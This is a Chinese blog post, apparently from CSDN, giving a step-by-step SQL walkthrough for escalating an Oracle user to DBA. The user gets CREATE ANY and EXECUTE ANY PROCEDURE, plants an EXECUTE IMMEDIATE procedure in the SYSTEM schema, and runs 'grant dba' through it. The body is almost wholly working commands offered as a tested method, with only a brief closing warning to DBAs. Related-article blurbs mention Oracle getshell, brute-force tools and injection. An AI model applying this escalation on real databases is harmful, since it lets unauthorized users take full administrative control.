如何利用系统漏洞获取Oracle DBA权限- 实测可用

最新推荐文章于 2022-09-21 11:19:41 发布
最新推荐文章于 2022-09-21 11:19:41 发布
阅读量878 收藏 1
点赞数
分类专栏: 12c

如何利用系统漏洞获取Oracle DBA权限

1、创建一个用户hacker

SQL>create user hacker identified by hacker123

         default tablespace users

         quota unlimited on users;

2、为hacker用户赋权

SQL>grant create session to hacker;

SQL>grant create any procedure,execute any procedure to hacker;

说明:用户只要有了create any procedure,execute any procedure这些权限就够了

3、以hacker用户连接数据库

SQL>conn hacker/hacker123;

4、查询当前用户都有哪些权限

SQL>select * from session_privs;

5、创建一个存储过程

SQL>create procedure system.h1(

         h1_str in varchar2)

         as

         begin

         execute immediate h1_str;

         end;

         /

6、执行此存储过程

SQL>execute system.h1('grant dba to hacker');

7、重新以hacker用户连接数据库

SQL>conn hacker/hacker123;

8、查询此用户此时的权限

SQL>select * from session_privs;

SQL>select * from session_roles;

然而,事物都具有两面性,此实验也告诫DBA朋友们,赋予用户create any procedure,execute any procedure 权限或者是含有“any”字眼的权限时要慎重!!!

p14159
关注
专栏目录
OpenSSL命令注入漏洞 (CVE-2022-1292)分析与防护
不忘初心,护天下安全!
10-07 5255
OpenSSL是 OpenSSL团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。OpenSSL存在远程代码执行漏洞,漏洞编号CVE-2022-1292。该漏洞是由于c_rehashc脚本未正确清理shell元字符的问题,未经授权的攻击者可通过构造恶意数据,从而执行系统命令,导致远程代码执行。
如何查找oracle漏洞对应补丁号,Oracle 漏洞补丁如何查找下载并打补丁,什么漏洞都可用Opatch?...
weixin_33397740的博客
04-04 3614
我需要打这么多漏洞,有没有大师跟我 说如何处理比较好,是否是一个一个下载漏洞?序号 危险级别 漏洞编号 漏洞名称 返回信息12 高危险 009A071 Oracle数据库服务器Core RDBMS组件安全漏洞(CVE-2011-2239) Oracle Version:11.2.0.1....
记一次利用应用程序漏洞获取win10计算机服务器操作权限
清风送云,天上无月
03-06 897
前提条件 1,安装VMware、kali、win10 2,漏洞程序:easyfilesharing7.2 具体步骤 1,进入msfconsole控制台: 2,搜索easyfilesharing可利用的漏洞: 3,进入漏洞控制模块:(复制漏洞1名称) 4,查看需要的配置信息: 5,设置目标主机IP: 6,运行攻击模块,成功获取权限: 7,利用命令对目标计算机进行操作: ls:(查看目标计算机当前目录下的文件) upload:(上传文件到目标计算机) ..
获取dba权限的存储过程
byebyegov5qq
02-09 101
SQL> conn / as sysdba Connected. SQL> create user hacker identified by bbk_12345; User created. SQL> grant create session to hacker; G...
Oracle再次被曝漏洞,影响33万用户
weixin_33858485的博客
02-02 158
2019独角兽企业重金招聘Python工程师标准>>> ...
高级DBA带你处理Mysql数据库漏洞修复方法以及升级版本方法指南最详细全网唯一
最新发布
nasen512的博客
09-21 1万+
mysql修复漏洞方法window平台以及linux平台非常详细,全网独一份,值得收藏,尤其是DBA跟运维实施必须收藏!运维工程师比如用到!
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 5657
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
oracle dba 有哪些权限,Oracle DBA应知应会 -- 权限管理
weixin_32541333的博客
04-05 3880
视图 作用ALL_COL_PRIVS 表示列上的授权,用户和PUBLIC是被授予者ALL_COL_PRIVS_MADE 表示列上的授权,用户是属主和被授予者ALL_COL_RECD 表示列上的授权,用户和PUBLIC是被授予者ALL_TAB_PRIVS 表示对象上的授权,用户是PUBLIC或被授予者或用户是属主ALL_TAB_PRIVS_MADE 表示对象上的权限,用户是属主或授予者ALL_TAB...
解决mysql漏洞 Oracle MySQL Server远程安全漏洞(CVE-2015-0411)
dieweidong5625的博客
04-19 3279
有时候会检测到服务器有很多漏洞,而大部分漏洞都是由于服务的版本过低的原因,因为官网出现漏洞就会发布新版本来修复这个漏洞,所以一般情况下,我们只需要对相应的软件包进行升级到安全版本即可。 通过查阅官网信息,Oracle MySQL Server远程安全漏洞(CVE-2015-0411),受影响系统: OracleMySQL Server <= 5.6.21Oracle MyS...
2020年10月Oracle安全补丁:四个远程无凭证漏洞 两个内核级别漏洞需关注
Enmotech的博客
10-22 2541
墨墨导读:Oracle 公司发布了最新一期的数据库重要补丁更新建议,我们整理和分析10月号的内容以便供用户和读者参考。数据技术嘉年华,十周年盛大开启,点我立即报名!大会以“自研·智能·新...
Oracle数据库执行脚本常用命令小结
09-10
主要介绍了Oracle数据库执行脚本常用命令小结的相关资料,需要的朋友可以参考下
Oracle也有注入漏洞
09-11
Oracle也有注入漏洞
Ladon6_路由器_扫描工具_oracle_密码爆破_getshell_源码.zip
09-30
Ladon6_路由器_扫描工具_oracle_密码爆破_getshell_源码.zip
8个DBA最常用的监控Oracle数据库的常用shell脚本
热门推荐
David Dai -- Focus on Oracle
11-10 2万+
 本文介绍了8个常用的监控数据shell脚本。首先回顾了一些DBA常用的Unix命令,以及解释了如何通过Unix Cron来定时执行DBA脚本。网上也有好多类似的文章,但基本上都不能正常运行,花点时间重新整理了下,以后就能直接使用了。 一.同时文章还介绍了8个重要的脚本来监控Oracle数据库: 1.检查实例的可用性 2.检查监听器的可用性 3.检查alert日志文件中的错误信息 4.在存放l
shell 读取oracle,Linux下Oracle获取shell
weixin_39806413的博客
04-05 214
作者:浅凝很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认低权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。而对于Linux下的Oracle数据库***,因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑,...
oracle odat,通过Oracle执行系统命令
weixin_36400512的博客
04-06 354
成功连接上Oracle后,如何通过Oracle get到os-shell,网上搜集资料解决后进行简单记录。经历如下:内网中发现oralce em express服务,一个oracle的web管理端,碰撞密码进入后,没有找到什么getshell的点,甚至数据查询等也没有发现,无意中发现了dispather设置项,通过添加dispather监听0.0.0.0后成功连接上数据库(默认的1521是监听在1...
oracle调用shell
jc_benben的专栏
11-14 1762
1,创建java source create or replace and compile java source named Execshellcmd as import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Execshellcmd ...
犀利的 oracle 注入技术
zhalang8324的博客
11-27 1082
原来一直不知道oracle注入可以你拿shell,特意记录下 以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成   /xxx.jsp?id=1 and '1'   的形式即可。(用" 'a'|| "是为了让语句返回true值)   语句有点长,可能要用post提交。   以下是
利用Oracle漏洞提权笔记
原野
08-31 9824
 1.利用已知的Oracle用户名连上数据库,并创建java提权函数C:/WINDOWS/system32>sqlplus /nologSQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008Copyright (c) 1982, 2002, Oracle Corporation.  Al
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值